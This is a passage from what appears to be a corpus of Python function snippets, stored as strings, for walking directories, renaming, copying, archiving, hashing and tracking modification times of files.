self._get_base_files():\n lines = open(filename).readlines()\n\n if self.Verbose:\n print 'Reading %s' % filename\n\n if filetype is 'Python':\n lines, write_out = self._update_python_file(lines, filename) \n elif filetype is 'Properties':\n lines, write_out = self._update_properties_file(lines,filename)\n else:\n raise TypeError, \"Unknown base file type %s\" % filetype\n\n if write_out:\n self._file_writer(lines, filename)", "def update_ccd_dir(self, components: str):\n\n for f in os.listdir(components):\n c = ccd_reader.read_pdb_cif_file(os.path.join(components, f)).component\n self.process_template(c)", "def iterStamps(self):\n try:\n names = os.listdir(self.path)\n except OSError:\n return\n for name in names:\n if name and name[0] != '.':\n try:\n yield self.stampType(name)\n except:\n pass", "def process_directory(dir, exiftool_path):\n for path_object in pathlib.Path(dir).glob(\"**/*\"):\n if path_object.is_file():\n verbose(f\"Processing file {path_object}\")\n process_file(path_object, exiftool_path)\n elif path_object.is_dir():\n verbose(f\"Processing directory {path_object}\")\n process_directory(path_object, exiftool_path)", "def parse_directory(input_dir, start_date = datetime(1970,1,1), end_date = datetime(9999,12,31,23,59,59)):\n logging.debug(\"Beginning parse_directory {}\".format(input_dir))\n\n def parse_gzipped_directory(input_dir, start_date, end_date, infos, backup_stamps):\n \"\"\" Scans a gzipped directory. This one in different situation \"\"\"\n try:\n file_names = sorted(os.listdir(input_dir)) \n for file_name in file_names:\n if file_name.endswith(\".manifest.gz\") or file_name.endswith(\".manifest\"):\n tmp = parse_file(input_dir + \"/\" + file_name, start_date, end_date, backup_stamps)\n backup_stamps[tmp[\"backup_label\"]] = tmp[\"backup_timestamp_stop_ts\"]\n if tmp:\n infos.append(tmp)\n except OSError as e:\n logging.error(\"Failed to open directory\", exc_info=True)\n exit(1)\n except:\n raise\n \n if not path.isdir(input_dir):\n logging.error(\"The specified path is not a directory\")\n exit(1)\n\n infos = []\n backup_stamps = {}\n if path.exists(input_dir + \"/backup.info\"):\n\n dir_names = sorted(os.listdir(input_dir + \"/backup.history\"))\n for dir_name in dir_names:\n parse_gzipped_directory(input_dir + \"/backup.history/\" + dir_name, start_date, end_date, infos, backup_stamps)\n\n else:\n parse_gzipped_directory(input_dir, start_date, end_date, infos, backup_stamps)\n \n logging.debug(\"End parse_directory\")\n return infos", "def demo_walk():\n os.chdir('Lyrics')\n for directory_name, subdirectories, filenames in os.walk('.'):\n print(\"Directory:\", directory_name)\n print(\"\\tcontains subdirectories:\", subdirectories)\n print(\"\\tand files:\", filenames)\n print(\"(Current working directory is: {})\".format(os.getcwd()))\n\n # Loop through each file in the (current) directory\n for filename in filenames:\n new_name = get_fixed_filename(filename)\n source = os.path.join(directory_name, filename)\n destination = os.path.join(directory_name, new_name)\n print(\"Renaming {} to {}\".format(source, destination))\n os.rename(source, destination)", "def change_dir(filename):", "def index_all_files(self, root_dir):\n pass", "def refreshSizeCrcDate(apRoot,old_sizeCrcDate,progress=None,removeEmpties=False,fullRefresh=False):\n rootIsMods = (apRoot == dirs['mods']) #--Filtered scanning for mods directory.\n norm_ghost = (rootIsMods and Installer.getGhosted()) or {}\n ghost_norm = dict((y,x) for x,y in norm_ghost.iteritems())\n rootName = apRoot.stail\n progress = progress or bolt.Progress()\n new_sizeCrcDate = {}\n bethFiles = bush.bethDataFiles\n skipExts = Installer.skipExts\n asRoot = apRoot.s\n relPos = len(apRoot.s)+1\n pending = set()\n #--Scan for changed files\n progress(0,_(\"%s: Pre-Scanning...\") % rootName)\n progress.setFull(1)\n dirDirsFiles = []\n emptyDirs = set()\n for asDir,sDirs,sFiles in os.walk(asRoot):\n progress(0.05,_(\"%s: Pre-Scanning...\\n%s\") % (rootName,asDir[relPos:]))\n if rootIsMods and asDir == asRoot:\n sDirs[:] = [x for x in sDirs if x.lower() not in Installer.dataDirsMinus]\n dirDirsFiles.append((asDir,sDirs,sFiles))\n if not (sDirs or sFiles): emptyDirs.add(GPath(asDir))\n progress(0,_(\"%s: Scanning...\") % rootName)\n progress.setFull(1+len(dirDirsFiles))\n for index,(asDir,sDirs,sFiles) in enumerate(dirDirsFiles):\n progress(index)\n rsDir = asDir[relPos:]\n inModsRoot = rootIsMods and not rsDir\n apDir = GPath(asDir)\n rpDir = GPath(rsDir)\n for sFile in sFiles:\n #print '...',sFile\n ext = sFile[sFile.rfind('.'):].lower()\n rpFile = rpDir.join(sFile)\n if inModsRoot:\n if ext in skipExts: continue\n if not rsDir and sFile.lower() in bethFiles: continue\n rpFile = ghost_norm.get(rpFile,rpFile)\n isEspm = not rsDir and (ext == '.esp' or ext == '.esm')\n apFile = apDir.join(sFile)\n size = apFile.size\n date = apFile.mtime\n oSize,oCrc,oDate = old_sizeCrcDate.get(rpFile,(0,0,0))\n if size == oSize and (date == oDate or isEspm):\n new_sizeCrcDate[rpFile] = (oSize,oCrc,oDate)\n else:\n pending.add(rpFile)\n #--Remove empty dirs?\n if settings['bash.installers.removeEmptyDirs']:\n for dir in emptyDirs: \n try: dir.removedirs()\n except OSError: pass\n #--Force update?\n if fullRefresh: pending |= set(new_sizeCrcDate)\n changed = bool(pending) or (len(new_sizeCrcDate) != len(old_sizeCrcDate))\n #--Update crcs?\n if pending:\n progress(0,_(\"%s: Calculating CRCs...\\n\") % rootName)\n progress.setFull(1+len(pending))\n try:\n us = unicode(rpFile.s, sys.getfilesystemencoding())\n except TypeError:\n us = rpFile.s\n for index,rpFile in enumerate(sorted(pending)):\n string = (_(\"%s: Calculating CRCs...\\n%s\") % \n (rootName, us)\n )\n progress(index,string)\n apFile = apRoot.join(norm_ghost.get(rpFile,rpFile))\n crc = apFile.crc\n size = apFile.size\n date = apFile.mtime\n new_sizeCrcDate[rpFile] = (size,crc,date)\n old_sizeCrcDate.clear()\n old_sizeCrcDate.update(new_sizeCrcDate)\n #--Done\n return changed", "def parse_dir_replace(args, dirname, names):\n for name in names:\n path = os.path.join(dirname, name)\n\n if os.path.isfile(path):\n parse_file_replace(path, args)", "def deep_watch(self, d: Path) -> None:\n dir_links = [_ for _ in all_subdirs(d) if is_link_to_dir(_)]\n\n for watch_path in [d, *dir_links]:\n self.add_watch(\n str(watch_path),\n pyinotify.ALL_EVENTS,\n rec=True,\n )", "def find_old_files(directory):\n # go to the directory\n os.chdir(directory)\n \n # construct the find command to interogate the directory\n find_cmd = [\"find\"]\n find_cmd.append(\"*\")\n find_cmd.append(\"-atime\")\n find_cmd.append(\"+\"+str(DAYS_OLD))\n \n # run the find command\n try:\n find = subprocess.Popen(\" \".join(find_cmd),shell=True,stdout=subprocess.PIPE,stderr=subprocess.PIPE)\n except:\n raise\n # get the standard output\n out, err = find.communicate() # get the standard output\n found = out.decode().split() # split the text into a list\n \n # go back to our starting directory \n os.chdir(iwd)\n \n return(found)", "def organizeDir(self):\n # Classify every file in dir\n for file in os.listdir(self.path):\n curPath = self.path + file\n self.moveFile(curPath)", "def fileManager():\n\n\t# First we change the working directory to the Downloads folder\n\tdownloadsPath = '/Users/harshithmohankumar/Downloads'\n\tos.chdir(downloadsPath)\n\t# Next we will get all of the files in the directory to organize\n\tfile = [f for f in os.scandir() if f.is_file()]\n\t# Now loop through all the files and organize them\n\tfor f in file:\n\t\tfileName = f.name\n\t\t# Obtain the extension of the file\n\t\ti = fileName.rfind('.')\n\t\text = fileName[i:].lower()\n\t\t# Match the extension to the according directory\n\t\ttoFile = get_key(ext)\n\t\t# Now move the file to that directory\n\t\tif Path(toFile).exists():\n\t\t\tfull_path = os.path.join(downloadsPath,fileName)\n\t\t\tfileName = renameFile(toFile,ext)\n\t\t\tos.chdir(downloadsPath)\n\t\t\tto_path = os.path.join(downloadsPath,toFile,fileName)\n\t\t\tos.rename(full_path,to_path)", "def pushDocsFromDir(docDir):\n\tfor i in os.listdir(docDir):\n\t\tif not(i.endswith(\".DS_Store\")):\n\t\t\tif not(docDir.endswith(\"/\")):\n\t\t\t\tfilename = (docDir+\"/\"+i)\n\t\t\telse:\n\t\t\t\tfilename = docDir + i\n\t\t\tpushDocumentToPhone(filename)\n\n\tprint \"Finished pushing files.\"", "def touch_files_dependent_on_changes(kymera_path, dirs, suffixes, changes):\n for dir in dirs:\n if dir[0] != '/':\n # This is a relative path to kymera root\n dir = kymera_path + dir\n if not os.path.exists(dir):\n print \"Directory %s included in ALL_SRCDIRS, ALL_INCDIRS or CFG_LIBS doesn't exist, continuing...\" % dir\n else:\n for file_name in os.listdir(dir):\n full_file_path= os.path.join(dir, file_name)\n # Filter a list of filenames down to those with one of the given suffixes\"\n if matching_file(suffixes, full_file_path):\n # Find all the files from a set with one of a list of suffices\n # containing one of the changed definitions\n if grep_words(changes, full_file_path):\n print \"Mark file for rebuild:\", full_file_path\n touch_file(full_file_path)", "def update(self):\n while True:\n result = win32event.WaitForSingleObject(self._overlapped.hEvent, 0)\n if result == win32con.WAIT_OBJECT_0:\n self._num_bytes_returned = win32file.GetOverlappedResult(\n self._directory,\n self._overlapped,\n True\n )\n timestamp = datetime.datetime.fromtimestamp(\n datetime.datetime.utcnow().timestamp()\n )\n self._event_properties['Path'] = self._get_path()\n self._event_properties['FileName'] = self._get_file_name()\n self._event_properties['Timestamp'] = timestamp\n self._event_properties['EventType'] = self._get_event_type()\n self._set_watcher()\n break\n if result == win32con.WAIT_FAILED:\n self.close()\n raise FileMonitorError()", "def filelist(basedir):\n day_files = []\n for root, dirs, files in os.walk(basedir):\n for file in files:\n if file.endswith(\".png\"):\n day_files.append(os.path.join(file))\n dates_files = []\n\n for i in day_files:\n year = i.split('_')[1]\n day = i.split('_')[2]\n mounth = i.split('_')[3]\n hour = i.split('_')[4]\n dates_files.append(UTCDateTime(year+'-'+mounth+'-'+day+'T'+hour)-3)\n return sorted(dates_files)", "def update_files(self):\n try:\n db_files = self.dbc.get_file_list(self.remote_directory)\n except rest.ErrorResponse as e:\n print str(datetime.datetime.now()) \\\n + \": Could not get remote file list.\"\n print e.reason\n return False\n new_files = set(db_files) - self.file_set\n old_files = self.file_set - set(db_files)\n if new_files != set() or old_files != set():\n self.file_set = set(db_files)\n for filename in new_files:\n try:\n self.dbc.get_file(filename)\n except rest.ErrorResponse as e:\n print str(datetime.datetime.now()) + e.reason\n for filename in old_files:\n try:\n os.remove(self.local_directory + \"/\" + filename)\n except OSError:\n pass\n print str(datetime.datetime.now()) + \": Fileset changed:\"\n print self.file_set\n email_changes(new_files, old_files)\n print str(datetime.datetime.now()) \\\n + \": Email sent from update_files().\"\n return True\n return False", "def test_scan_dir_files(self):\n self.run_scan(self.subdir, self.nest_fcount + 1)", "def updateDocFiles(self):\n for filename, filetype in self._get_doc_files():\n lines = open(filename).readlines()\n\n if self.Verbose:\n print 'Reading %s' % filename\n \n if filename.endswith('conf.py'):\n lines, write_out = self._update_doc_conf_file(lines, filename)\n else:\n raise TypeError, \"Unknown doc file type: %s\" % filetype\n\n if write_out:\n self._file_writer(lines, filename)", "def update_projects(self):\n self._read_directory()\n print(self._filenames)\n for filename in self._filenames:\n project = self._make_project(self._read_project(filename))\n self.projects.append(\n (int(project.get_id()), project)\n )\n self.projects = sorted(self.projects, reverse=True)", "def run(dirname: str) -> ():\n top, base = os.path.split(dirname)\n if base == '':\n base = top\n for root, _, files in os.walk(dirname):\n newdir = root.replace(base,f\"pub{base}\") # we might have nested folders\n os.makedirs(newdir)\n srcfiles = [f for f in files if f.endswith(\".rs\")]\n for src in srcfiles:\n if prep(os.path.join(root,src)) is not 0:\n pass # source is probably invalid. Just skip\n newfile = open(os.path.join(newdir,src),\"w\")\n oldfile = open(os.path.join(root,src),\"r\")\n try:\n scan(oldfile, newfile)\n except Exception as e:\n print(f\"failed to rewrite {src} with error:\\n{e}\")\n finally:\n newfile.close()\n oldfile.close()", "def _get_files_timestamps(self, working_dir: Union[str, os.PathLike]):\n return {f: os.path.getmtime(os.path.join(working_dir, f)) for f in os.listdir(working_dir)}", "def process_directory(self, directory):\n files = list(glob.iglob(os.path.join(directory, '*.md5')))\n logging.info('Processing %d datasets in directory %s.' % (len(files), directory))\n for f in files:\n f = os.path.basename(f)\n logging.info('Sending process request for dataset: %s' % f)\n self.job_submit_socket.send_string(f)\n logging.info('Finished processing %s.' % directory)", "def sync_dir(self):\n\n # mark the trajectories that we have seen\n trajectories = os.listdir(self.trajectory_dir)\n \n for trajectory_file in trajectories:\n\n if trajectory_file not in self.seen_trajectories:\n\n created = self.upload_trajectory(trajectory_file)\n self.seen_trajectories.add(trajectory_file)\n\n if created is True:\n print \"Total of %s solved trajectories\" % \\\n SolvedTrajectory.objects.count(), created", "def recurse(path):\n for dirpath, dirnames, filenames in os.walk(path):\n for filename in filenames:\n if filename.endswith('.robot'):\n filepath = os.path.join(dirpath, filename)\n reformat(filepath)", "def up_to_date(db, args, pattern):\n\n any_out_of_date = False\n num_found_files = 0\n for arg in args:\n find_data = None\n try:\n find_data = eugene_sys.FindFiles(pattern(arg))\n\n num_found_files = num_found_files+len(find_data)\n except ValueError:\n #print(f\"couldn't open directory {arg} or no suitable files found within...\")\n continue\n\n for file in find_data:\n key = file['cFileName']\n record = file['ftLastWriteTime']\n\n if db.compareWithRecord(key, record): continue # Up-to-date\n\n db_record = db.readRecord(key)\n db.writeRecord(key, record)\n\n old = eugene_sys.GetDateTimeFormat(db_record) if db_record > 0 else \"(null)\"\n new = eugene_sys.GetDateTimeFormat(record)\n\n msg = f\"`{key}' not up to date\"\n msg += _PAD[len(msg):]\n\n print(f\"{msg} ({old} -> {new})...\")\n any_out_of_date = True\n\n # For the query to return a 'True' result\n # - No database record can be out-of-date\n # - At LEAST one file in the directories\n # given in 'args' must've matched the\n # pattern\n result = (num_found_files > 0) and not any_out_of_date\n\n if result: print(\" ...up to date!\")\n return result", "def modtime_all(self):\n random.seed(4474)\n pathA = os.path.join(self.testpath,'A')\n pathB = os.path.join(self.testpath,'B')\n\n for dirpath, dirnames, filenames in os.walk(pathA):\n for f in filenames:\n change_time(os.path.join(dirpath,f),random.randint(-100*MAX_TIME_MOD,-(MAX_TIME_MOD+2)))\n try:\n os.makedirs(pathB)\n except:\n pass", "def refresh_all(self) -> None:\n self._update_thread.force_refresh_folder(self.feed_cache)", "def get_files_list(dirname, date_order, rdate_order):\n file_list = os.listdir(dirname)\n file_mtimes = dict.fromkeys(file_list)\n for f in file_list:\n if f[0] == '.':\n print \"Skipping file: \", f\n del file_mtimes[f]\n continue\n if date_order or rdate_order:\n file_mtimes[f] = os.stat(dirname + '/' + f).st_mtime\n if date_order or rdate_order:\n return sorted(file_mtimes.keys(), key=file_mtimes.get, reverse=rdate_order)\n else:\n return file_list", "def main():\n print(\"Current directory is\", os.getcwd())\n os.chdir('Lyrics/Lyrics')\n\n for dir_name, dir_list, file_list in os.walk(\".\"):\n for filename in file_list:\n file_path = dir_name + \"\\\\\" + filename\n new_name = get_fixed_filename(file_path)\n os.rename(file_path, new_name)", "def walk_dir(self, dir):\n if self.ppath_prefix_len:\n prefix = self.ppath_prefix[self.ppath_prefix_idx%self.ppath_prefix_len]\n self.ppath_prefix_idx += 1\n merged_path = os.path.join(prefix, dir)\n for root, dirs, files in self.fswalk_base(merged_path):\n yield merged_path, dirs, files\n else:\n yield self.fswalk_base(dir)", "def rebase_add_date():\n\tfilenames, clippings = load_clippings(inFolder)\n\tfor file, clip in zip(filenames, clippings):\n\t\tdate = \"-\".join(file.split(\"-\")[:3])\n\t\tdate = date.split(\"/\")[-1]\n\t\tclip[\"clipDate\"] = date\n\t\twith open(file, \"w\") as outfile:\n\t\t\tjson.dump(clip, outfile)", "def updateTestFiles(self):\n for filename, filetype in self._get_test_files():\n lines = open(filename).readlines()\n found_version_line = False\n\n if self.Verbose:\n print 'Reading %s' % filename\n\n if filetype is 'Python':\n lines, write_out = self._update_python_file(lines, filename)\n else:\n raise TypeError, \"Unknown test file type %s\" % filetype\n\n if write_out:\n self._file_writer(lines, filename)", "def _read_directory(self):\n self._filenames = glob.glob(self._directory + \"/*.project\")", "def directoryModifiedHandler(ob, event):\n query = dict(object_provides=IEntry.__identifier__)\n for l in ob.restrictedTraverse('@@folderListing')(**query):\n l.getObject().reindexObject(idxs=[\"pdir_keywords\"])", "def _archiveDataByDate(self, src, dest):\n root = os.getcwd()\n srcPath = join(root,src)\n destPath = join(root,dest)\n f = [] #Array with list of files in directory\n fDate = [] #Array with list of files with certain date;\n s = [] #Array with list of files successfully copied\n for (dirpath, dirnames, filenames) in walk(srcPath):\n f.extend(filenames)\n if len(f) > 0:\n for i in f:\n match = re.search(r'\\d{4}-\\d{2}-\\d{2}', i)\n if str(i) != 'archiving_log.txt' and str(i) != 'archiving_log.txt~' and str(i) != 'archivingScript.py' and match.group() == self.date:\n try:\n buffer_size = int(20000)\n fileSrcPath = join(dirpath, i)\n fileDestPath = join(destPath, i)\n with open(fileSrcPath, 'rb') as fsrc:\n with open(fileDestPath, 'wb') as fdest:\n copy = shutil.copyfileobj(fsrc,fdest,buffer_size)\n copy\n self._backupLog('Copy Operation File: '+str(i)+ '\\t' + 'Time: '+ str(time.strftime(\"%H:%M:%S\")) +'\\n') #+ '\\t'+ 'Path: '+ str(srcPath)\n s.append(i)\n except shutil.Error as e:\n self._backupLog('Error: %s' % e + '\\t' + 'File: '+str(i)+ '\\t' + 'Time: '+ str(time.strftime(\"%H:%M:%S\")) + '\\n')\n except IOError as e:\n self._backupLog('Error: %s' % e.strerror + '\\t' + 'File: '+str(i)+ '\\t' + 'Time: '+ str(time.strftime(\"%H:%M:%S\")) + '\\n')\n if len(s) >0:\n for (dirpath,dirnames,filenames) in walk(srcPath):\n for cfile in f:\n for sfile in s:\n if cfile == sfile:\n try:\n filetoDelete = join(srcPath, cfile)\n os.remove(filetoDelete)\n self._backupLog('Delete Operation File: '+str(cfile)+ '\\t' + 'Time: '+ str(time.strftime(\"%H:%M:%S\")) + '\\n')\n except OSError, e:\n self._backupLog('Error deleting file: %s - %s.' % (e.filename, e.strerror) + '\\t' + 'Time: '+ str(time.strftime(\"%H:%M:%S\")) + '\\n')", "def parse_and_add_directory(self, list_of_root_tags, directory):\n\n # Check if directory exists and list_of_root_tags isn't empty\n\n if len(list_of_root_tags) == 0:\n raise Exception(\n \"{} : List of root tags empty in parse_and_add_directory!\".format(\n self.__schema_name\n )\n )\n\n if not os.path.isdir(directory):\n raise Exception(\n \"{} : Directory {} does not exist in parse_and_add_directory!\".format(\n self.__schema_name, directory\n )\n )\n\n for subdir, dirs, files in os.walk(directory):\n for file in files:\n if file.upper().endswith(\".XML\"):\n try:\n new_path = os.path.join(subdir, file)\n parsed = self.__get_parsed_relaxng(new_path)\n root_tag = parsed.getroot().tag\n if root_tag in list_of_root_tags:\n self.add_test(\n f\"Path Added: {file}\", new_path, None, parsed_xml=parsed\n )\n except:\n pass", "def autoBuildTick (self, event = None):\r\n for pathname, oldmtime in self.autobuildfiles.iteritems():\r\n newmtime = os.stat(pathname).st_mtime\r\n if newmtime != oldmtime:\r\n #print \"Auto rebuild triggered by: \", pathname\r\n self.autobuildfiles[pathname] = newmtime\r\n self.rebuild()\r\n break", "def loop_through_dates(in_dir,\n out_dir,\n start_date,\n end_date,\n extent,\n temporal_composite=\"monthly\",\n product=\"all_products\",\n area=\"global-extracted\",\n neodaas_name=False):\n\n start_date_obj = datetime.datetime.strptime(start_date, \"%Y-%m-%d\")\n end_date_obj = datetime.datetime.strptime(end_date, \"%Y-%m-%d\")\n\n current_date = start_date_obj\n\n while current_date < end_date_obj:\n\n if temporal_composite.lower() == \"monthly\":\n str_date = current_date.strftime(\"%Y%m\")\n else:\n str_date = current_date.strftime(\"%Y%m%d\")\n\n file_path = os.path.join(in_dir, temporal_composite, product,\n \"{:02}\".format(current_date.year),\n \"*{}*nc\".format(str_date))\n in_netcdfs = glob.glob(file_path)\n\n for in_netcdf in in_netcdfs:\n\n print(\"Extracting {}\".format(in_netcdf))\n out_netcdf_dir = os.path.join(out_dir,\n \"{:02}\".format(current_date.year))\n try:\n os.makedirs(out_netcdf_dir)\n except OSError:\n # If already exists continue\n pass\n\n if neodaas_name:\n output_name = \"OC-CCI_{product}_L4_{area}_{period}_{date}.nc\".format(\n product=product,\n area=area,\n period=TEMPORAL_COMPOSITE_NAMES[temporal_composite],\n date=str_date)\n else:\n output_name = os.path.basename(in_netcdf).replace(\".nc\",\n \"_{}.nc\".format(area))\n out_netcdf_file = os.path.join(out_netcdf_dir, output_name)\n\n if os.path.isfile(out_netcdf_file):\n continue\n\n libsubarea.nk_subarea(in_netcdf, out_netcdf_file,\n [\"lon\", \"lat\"], [extent[0], extent[3]],\n [extent[2], extent[1]])\n\n if temporal_composite.lower() == \"monthly\":\n current_date = current_date + relativedelta.relativedelta(months=1)\n # For the daily, 5day and 8day composite itterate a day at a time so get all composites\n # If not then when starting out of sequence keep missing data.\n else:\n current_date = current_date + relativedelta.relativedelta(days=1)", "def Main(root_directory):\n filepaths = GetAllFilepaths(root_directory)\n for filepath in filepaths:\n parser = fileparser.CreateParser(filepath)\n if not parser:\n ReportWarning('cannot find a parser for file %s, skipping...' %\n filepath)\n continue\n old_file_contents = ReadFileIntoString(filepath)\n comment_blocks = parser.FindAllCommentBlocks(old_file_contents)\n if not comment_blocks:\n ReportWarning('cannot find any comment blocks in file %s' %\n filepath)\n old_copyright_block = parser.FindCopyrightBlock(comment_blocks)\n if not old_copyright_block:\n ReportWarning('cannot find copyright block in file %s' % filepath)\n (year, holder) = parser.GetCopyrightBlockAttributes(old_copyright_block)\n if holder and not ConfirmAllowedCopyrightHolder(holder):\n ReportWarning(\n 'unrecognized copyright holder \"%s\" in file %s, skipping...' % (\n holder, filepath))\n continue\n new_copyright_block = parser.CreateCopyrightBlock(year, holder)\n if old_copyright_block:\n new_file_contents = old_file_contents.replace(\n old_copyright_block, new_copyright_block, 1)\n else:\n new_file_contents = new_copyright_block + old_file_contents\n WriteStringToFile(new_file_contents, filepath)", "def fileparse(self, dir, givendate, i, j):\t\t# i and j are counters that will be incremented by at most 1 (each) every time fileparse is called\n if self.findcreatedate() > givendate:\t# Test file's creation date against date passed into function\n if j != 0:\t\t\t\t# If this is the first time (locally) we've found a self.filename that needs to be copied, reset j\n print \"\\n\",\n j = 0\n dest = dir + self.filename\n copy(self.filename, dest)\n print \"\\r{} being copied\".format(self.filename),\n i += 1\t\t\t\t\t# increment our count of self.filenames that have been copied in a row\n else:\n j += 1\t\t\t\t\t# otherwise, increment our count of self.filenames skipped\n print \"\\r{} files parsed after last success\".format(j),\n countarf = [i, j]\t\t\t\t\t# put i an j into an array, then return it\n return countarf", "def traverse_posts(root):\n for (dirpath, dirnames, filenames) in os.walk(root):\n for filename in filenames:\n date, file = parse_filename(filename)\n if not date or not file:\n continue\n yield tuple([dirpath, filename, file, date])", "def upgrade_nrml(directory, dry_run, multipoint):\n for cwd, dirs, files in os.walk(directory):\n for f in files:\n path = os.path.join(cwd, f)\n if f.endswith('.xml'):\n ip = iterparse(path, events=('start',))\n next(ip) # read node zero\n try:\n fulltag = next(ip)[1].tag # tag of the first node\n xmlns, tag = fulltag.split('}')\n except: # not a NRML file\n xmlns, tag = '', ''\n if xmlns[1:] == NRML05: # already upgraded\n if 'sourceModel' in tag and multipoint:\n print('upgrading to multiPointSources', path)\n node0 = nrml.read(path)[0]\n sourceconverter.update_source_model(node0)\n with open(path, 'wb') as f:\n nrml.write([node0], f, gml=True)\n elif 'nrml/0.4' in xmlns and (\n 'vulnerability' in tag or 'fragility' in tag or\n 'sourceModel' in tag):\n if not dry_run:\n print('Upgrading', path)\n try:\n upgrade_file(path, multipoint)\n except Exception as exc:\n raise\n print(exc)\n else:\n print('Not upgrading', path)", "def get_update_file_list(directory):\n update_files_list = set(UPDATE_FILES_STATIC)\n update_files_exclude = set(UPDATE_FILES_EXCLUDE)\n\n for root, dirs, files in os.walk(path.join(PATH_ROOT, directory)):\n for filen in files:\n if UPDATE_FILES_RE.match(filen):\n filep = path.join(root, filen)\n update_files_list.add(path.relpath(filep, PATH_ROOT))\n \n return update_files_list - update_files_exclude", "def loop_dir(dir_name: str, graph_ext: str) -> None:\n directory = fsencode(dir_name)\n for file in listdir(directory):\n filename = fsdecode(file)\n if filename.endswith(graph_ext):\n draw_graph(filename)", "def fix_file_dates(source_file_name, dest_file_name):\n shutil.copystat(source_file_name, dest_file_name)\n print(\"Fixed dates for \" + dest_file_name)", "def dirGenerator(datadirectory):\n\n subdirectories = [row for row in os.listdir(datadirectory) if '$' not in row]\n\n #iterate through subdirectories\n for day in subdirectories:\n\n #collect raw data set file names in sub directories\n fileNames = [row for row in os.listdir(datadirectory + day + '\\\\RawDataFiles\\\\')]\n\n #iterate over the raw datasets\n print 'There are ' + str(len(fileNames)) + ' datasets in ' + day\n for index, datafile in enumerate(fileNames):\n yield datadirectory + day + '\\\\RawDataFiles\\\\' + datafile, day, datafile, index", "def index_files(self, input_dir, output_dir):\n self.lucene = Lucene(output_dir)\n self.lucene.open_writer()\n for path, dirs, _ in os.walk(input_dir):\n for dir in sorted(dirs):\n for _, _, files in os.walk(os.path.join(input_dir, dir)):\n for fn in sorted(files):\n print \"Indexing \", os.path.join(input_dir + dir, fn), \"...\"\n self.index_file(os.path.join(input_dir + dir, fn))\n # closes Lucene index\n self.lucene.close_writer()", "def run(self):\n for filepage in self.generator:\n print (filepage)\n filepage.touch()", "def files(directory):\n p = directory.fullpath\n with os.scandir(p) as it:\n for entry in it:\n if not entry.is_dir(follow_symlinks=False):\n if entry.is_symlink():\n d = os.readlink(os.path.join(p, entry.name))\n f = File(directory_id=directory.id,\n size=0, mtime=0,\n name=entry.name,\n link=True, destination=d)\n else:\n st = entry.stat(follow_symlinks=False)\n f = File(directory_id=directory.id,\n size=st.st_size,\n mtime=int(st.st_mtime),\n name=entry.name)\n Session.add(f)\n Session.commit()", "def do_2004(in_dir, out_dir):\n dir_items = setup_outdir_and_get_input(in_dir, out_dir)\n for idx, item in enumerate(dir_items):\n full_path = in_dir + os.path.sep + item\n print(f\"{full_path} -> {out_dir}/{idx}\")\n create_dirs_and_write_files(full_path, idx, in_dir, item, out_dir)", "def scan_directory(self, dirname):\n if not dirname:\n dirname = os.getcwd()\n\n if os.path.exists(dirname):\n for item in os.listdir(dirname):\n item_path = os.path.join(dirname, item)\n if os.path.isfile(item_path):\n self.file_confidence.append(self.confidence(item_path))\n else:\n raise FileNotFoundError('Directory does not exist. Change your path and try again')", "def _get_dir_mtime(self, sentry_unit, directory):\n return sentry_unit.directory_stat(directory)['mtime']", "def updateDiskFileList(self):\n\n if self.m_curPath:\n # Get me just the files please.\n for _, _, files in os.walk(self.m_curPath):\n break\n else:\n files = []\n\n files.sort()\n if files != self.m_diskNames:\n self.m_diskNames[:] = files\n self.m_newNames[:] = []\n\n self.populateFileList()", "def update_proj_dir():\n cwd = os.getcwd()\n srcf_dir = cwd\n i = 0 # Flag\n flg_cpy = True # Flag to cpy func\n flg_rm = True # Flag to rm func\n file_uc_list = [] # Files unchanged\n file_c_list = [] # Files changed\n file_r_list = [] # Files to be removed\n # Project dir\n dstf_dir = r\"C:\\Users\\ajiteshr7\\Dropbox\\python_proj\"\n file_srclist = os.listdir(srcf_dir)\n file_dstlist = os.listdir(dstf_dir)\n file_uc_list, file_c_list = chk_chng(file_srclist, file_dstlist)\n # Display files unchanged\n if file_uc_list:\n print marker\n print \"File List\"\n print \"No of files : %d\" %(len(file_uc_list))\n print_file(file_uc_list)\n # Display files changed\n if file_c_list:\n print \"Files added\"\n print \"No of files added: %d\" %(len(file_c_list))\n print_file(file_c_list)\n else:\n print \"No files added\"\n print \"No of files added: 0\"\n flg_cpy = False\n # Copy files..\n i = cpy_c_files(file_c_list, srcf_dir, dstf_dir,flg_cpy)\n # Remove files...\n file_list, file_r_list = chk_chng(file_dstlist,file_srclist)\n if not file_r_list:\n flg_rm = False\n rm_f(file_r_list,dstf_dir,flg_rm)\n # Display result updated or didn't....\n if flg_cpy == False and flg_rm == False:\n print \"Directory is up-to-date...\"\n elif i == len(file_c_list):\n print \"Sucessfully Updated the project directory :)\"\n else:\n print \"Didn't updated the folder.... =(\"\n return False\n return True", "def scan_dir(self, directory=\".\"):\n for root, dirs, files in os.walk(directory, topdown=False):\n for name in files:\n for filetype in self.allowed_file_types:\n if name.split(\".\")[-1] == filetype:\n self.song_list.append(os.path.join(root, name))", "def searchDirectory(_dirname):\n for (path, dirnames, filenames) in os.walk(_dirname):\n for filename in filenames:\n if os.path.splitext(filename)[-1] == \".h\":\n fullname = os.path.join(path, filename)\n md5 = makeMD5(fullname)\n updateMD5(fullname, md5)\n\n if os.path.isfile(fullname + \".tmp\"):\n os.remove(fullname + \".tmp\")", "def walk_dir(self, path = '/srv/www/mod_intf/interface_mod_sec/rules_dir/tmp'):\n for root, dirs, files in os.walk('/srv/www/mod_intf/interface_mod_sec/rules_dir/tmp'):\n for each_file in files:\n print root+\"/\"+ each_file\n self.move_files_to_db(path_file =root+\"/\"+each_file, file_name=each_file)\n return True", "def _get_fsevent_files(self):\r\n # Print the header columns to the output files\r\n Output.print_columns(self.l_all_fsevents)\r\n\r\n # Total number of files in events dir #\r\n t_files = len(os.listdir(self.path))\r\n for filename in os.listdir(self.path):\r\n if filename == 'fseventsd-uuid':\r\n t_files -= 1\r\n self.time_range_src_mod = []\r\n prev_mod_date = \"Unknown\"\r\n prev_last_wd = 0\r\n c_last_wd = 0\r\n\r\n # Uses file mod dates to generate time ranges by default unless\r\n # files are carved or mod dates lost due to exporting\r\n self.use_file_mod_dates = True\r\n\r\n # Run simple test to see if file mod dates\r\n # should be used to generate time ranges\r\n # In some instances fsevent files may not have\r\n # their original mod times preserved on export\r\n # This code will flag true when the same date and hour\r\n # exists for the first file and the last file\r\n # in the provided source fsevents folder\r\n first = os.path.join(self.path, os.listdir(self.path)[0])\r\n last = os.path.join(self.path, os.listdir(self.path)[len(os.listdir(self.path)) - 1])\r\n first = 